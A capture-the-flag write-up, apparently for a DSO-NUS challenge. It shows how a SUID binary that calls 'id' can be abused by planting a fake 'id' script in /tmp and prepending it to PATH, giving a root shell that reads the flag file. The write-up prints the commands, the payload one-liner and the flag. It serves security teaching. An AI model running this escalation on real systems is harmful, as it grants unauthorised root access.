Insecure (100)
Privilege escalation through SUID files and PATH variable manipulation

Problem

Someone once told me that SUID is a bad idea. Could you show me why?
insecure
7KB
Binary

Solution

The binary calls the id command three times, first without privileges, then as root, then again without privileges.
Since the SUID flag is set, we can manipulate the PATH variable to execute arbitrary code when id is called. The goal is to read the flag.txt file which requires root access. Thus, we need to spawn a shell as root.
The following bash script will only spawn the shell if the caller is root.
1
if [ `/bin/id -u` = "0" ]; then
2
echo "I am root" && /bin/bash
3
else
4
echo "I am not root"
5
fi
Copied!
Translating this into a one liner and creating our malicious id payload:
1
$ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id
Copied!
PATH variable manipulation:
1
$ cd /tmp
2
$ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id
3
$ chmod 777 id
4
$ export PATH=/tmp:$PATH
Copied!
After running insecure, we obtain a root shell:
1
I am not root
2
I am root
3
โ€‹
4
$ cat /flag.txt
5
DSO-NUS{b4fcfe57b8d2b05ff3310c663a0497b1026cf039baeee18669957152cdc276da}
Copied!
Last modified 8mo ago
Copy link